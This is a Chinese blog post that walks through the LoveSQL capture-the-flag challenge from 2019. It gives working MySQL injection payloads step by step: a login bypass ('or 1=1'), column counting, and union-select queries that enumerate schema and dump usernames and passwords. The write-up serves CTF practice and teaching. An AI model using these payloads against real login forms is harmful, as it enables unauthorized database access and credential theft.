[极客大挑战 2019]LoveSQL --不会编程的崽

说实在的,我挖出过的第一个真实漏洞就是sql漏洞。但是ctf我最讨厌的也是sql漏洞。sql花样太多了,各种注入,过滤,哎。。。这也是我为什么一直没做sql题目的原因。但是既然选择玩ctf,还是要硬着头皮上,先来个简单的当做复习吧。

已经知道这是sql的题目了,直接注入吧。

sql第一步肯定要知道是否存在过滤的。这题是入门级别,没过滤啥东西。然后尝试闭合符号,而且这种登录框,一定要尝试万能密码 。

复制代码
123' or 1=1#

如果使用双引号则返回错误。单引号闭合成功。这里也不能用'--+'注释后面的单引号。以后的sql都尝试一下就即可知道用哪个

给了我密码,最初以为是md5值,其实就是单纯的长密码QAQ。为什么要给admin的密码呢?我也不知道有什么用。。。反正我实验了一下,名字与密码都能注入,不管对错。。。我选择在密码里注入

接下来就直接看步骤吧

复制代码
1' order by 4#
复制代码
1' order by 3#

暴点

复制代码
1' union select 1,2,3#

查询数据库名称

复制代码
1' union select 1,database(),3#

查询表名

复制代码
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='geek'#

查询列名

复制代码
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'#

查询表里数据

复制代码
1' union select 1,group_concat(username),group_concat(password) from l0ve1ysq1#

这是最基础的mysql注入,如果不知道为什么这么构造payload简易学一下,不然很多东西看着还是很突兀的。还有就是最后一步**一定要加上group_concat()**以回显所有数据,因为表里边的数据很多,如果不加上只会回显第一行数据。

已经看见flag了,右键源代码复制粘贴即可

相关推荐
jieyu11192 小时前
网络、主机安全扫描工具
linux·安全·系统安全
FIN66683 小时前
昂瑞微冲刺科创板:创新驱动,引领射频芯片国产化新征程
前端·安全·前端框架·信息与通信·芯片
用户47949283569158 小时前
面试官:讲讲2FA 双因素认证原理
前端·后端·安全
Mintimate10 小时前
Vue项目接口防刷加固:接入腾讯云天御验证码实现人机验证、恶意请求拦截
前端·vue.js·安全
网安INF10 小时前
网络攻防技术:网络安全攻击概述
安全·web安全·网络安全·网络攻防
深盾安全12 小时前
C++实战:快速提取Android APK数字签名
安全
white-persist12 小时前
SQL 注入详解:从原理到实战
前端·网络·数据库·sql·安全·web安全·原型模式
AORO202512 小时前
防爆手机与普通手机的区别!
网络·5g·安全·智能手机·电脑·信息与通信
携欢13 小时前
Portswigger靶场之Exploiting a mass assignment vulnerability通关秘籍
前端·安全
嗨丶王哪跑13 小时前
网络安全审计技术原理与应用
运维·网络·安全·web安全